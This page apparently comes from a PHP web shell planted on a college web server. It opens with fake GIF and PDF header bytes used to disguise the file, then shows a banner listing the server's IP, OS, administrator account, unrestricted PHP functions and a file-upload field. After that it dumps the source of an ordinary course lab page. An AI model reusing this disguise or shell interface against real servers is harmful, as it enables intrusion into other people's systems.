GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/MMDT1144/Labs/Lab03/ |
Upload File : |
<? // JimMartinson/MMDT1144/Labs/Lab03/Lab03.phpinc $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); include('../../classInfo.phpinc'); $assignmentPoints = 15; $assignmentWeekDue = 3; $evaluationNumber = 3; $evaluationType = "Lab"; $evaluationTitle = "Create Assignments Site"; if ( !isset($assignmentSuffix) ) $assignmentSuffix = ''; $evaluationName = $evaluationType.twoDigit($evaluationNumber).$assignmentSuffix; #$f_uId = formValue('uId'); if ( $f_uId ) $userId = $f_uId; #if ( !isset($userId) ) $userId = $_SESSION['userId']; #$userFileName = str_replace(array("-"," "),"",username($userId)); $title = $evaluationName.": ".$evaluationTitle; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; $css .= ',colorCode.css'; include('common/pageHeader.phpinc'); $sectionTitle = $title; include('common/sectionHeader.phpinc'); include('Gradebook/EvaluationSubmission_BEGIN.phpinc'); #d_Var('$f_uId',$f_uId,'d'); #d_Var('$userFileName',$userFileName,'d'); ?> <?=$f_message?> <a name="Lab"></a> <fieldset><legend>Description</legend> Demonstrate the ability to create a website.<br> <?=$gradeNote?> </fieldset> <? $ShowSpanCountBefore = false; #$ShowSpanCountBefore = true; ?> <fieldset><legend><?=$evaluationType?> Instruction</legend> <span class="bold attention">Note: Do not perform this lab until Lab 2 has been graded.</span> <br>The purpose of this lab is to create a website. Spend some time and demonstrate your styling capabilities in the design. <ol id="main" class="count"> <li>Create a site to show your assignments.</li> <li>Create an index with links to your lab assignments.</li> <li>Include links for labs 2, 9, 11, and 12. The links should point to the lab directory. These links should not be functional until the labs have been submitted by you. You can see my example at <a href="http://cst.ridgewater.edu/Student/JimMartinson/" target="_blank">http://cst.ridgewater.edu/Student/JimMartinson/</a>.</li> <li>Upload it to the remote server.</li> <li>Turn in your assignment: <ol type="a"> <li>Ensure you have uploaded all work to your site (<a href="http://cst.ridgewater.edu/Student/<?=$userFileName?>/">http://cst.ridgewater.edu/Student/<?=$userFileName?>/</a>).</li> <li>Then <input type="submit" name="f_subtask" value="Submit"> for grading.</li> </ol> </li> </ol> <?=$gradeNote?> </fieldset> <? include('Gradebook/EvaluationSubmission_END.phpinc'); $deductionPoints = $evaluationInfo['evaluationPoints'] / 10; if ( $deductionPoints == 1 ) { $deductionPoints = '1 point'; } else { $deductionPoints = $deductionPoints.' points'; } ?> <fieldset><legend>Grading Criteria</legend> Demonstrated assignment effectively: <b><?=$evaluationInfo['evaluationPoints']?></b> points. <br> There are some things I expect. If they are incorrect you will lose the following: <br> Work submitted incorrectly: -<?=$deductionPoints?>. <br> Work submitted late: -<?=$deductionPoints?> per week. <br> Re-submission of work for grading: -<?=$deductionPoints?> per submission. <br> I reserve the right <b>not</b> to apply the deduction points at my absolute discretion. </fieldset> <? include('../../ReferencesResources.phpinc'); include('common/sectionFooter.phpinc'); ?> <script src="/js/colorCode.js"></script> <? include('common/pageFooter.phpinc'); ?>